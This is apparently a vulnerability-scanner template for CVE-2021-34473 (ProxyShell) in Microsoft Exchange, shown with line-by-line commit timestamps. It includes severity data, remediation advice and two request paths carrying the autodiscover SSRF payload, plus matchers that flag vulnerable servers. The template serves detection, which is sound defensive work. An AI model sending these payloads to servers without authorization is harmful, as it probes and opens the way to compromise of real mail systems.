2021-08-10 07:59:06 +00:00
|
|
|
id: CVE-2021-34473
|
|
|
|
|
|
|
|
info:
|
2022-05-02 21:50:47 +00:00
|
|
|
name: Exchange Server - Remote Code Execution
|
2021-08-12 16:39:42 +00:00
|
|
|
author: arcc,intx0x80,dwisiswant0,r3dg33k
|
2021-08-10 07:59:06 +00:00
|
|
|
severity: critical
|
|
|
|
description: |
|
2022-05-02 21:50:47 +00:00
|
|
|
Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
|
|
|
|
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
|
|
|
|
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
|
2022-05-02 21:50:47 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-34473
|
2022-05-17 09:18:12 +00:00
|
|
|
remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-34473
|
2022-06-01 21:31:44 +00:00
|
|
|
tags: cve,cve2021,ssrf,rce,exchange,cisa
|
2021-08-10 07:59:06 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-08-10 08:17:37 +00:00
|
|
|
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
|
2021-08-10 08:53:58 +00:00
|
|
|
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
|
2021-08-10 07:59:06 +00:00
|
|
|
|
|
|
|
matchers:
|
2021-08-10 08:53:58 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
2021-08-12 16:39:42 +00:00
|
|
|
condition: or
|
2021-08-10 08:53:58 +00:00
|
|
|
words:
|
2021-08-12 16:39:42 +00:00
|
|
|
- "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
|
2022-05-02 21:50:47 +00:00
|
|
|
- "Exchange MAPI/HTTP Connectivity Endpoint"
|
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/02
|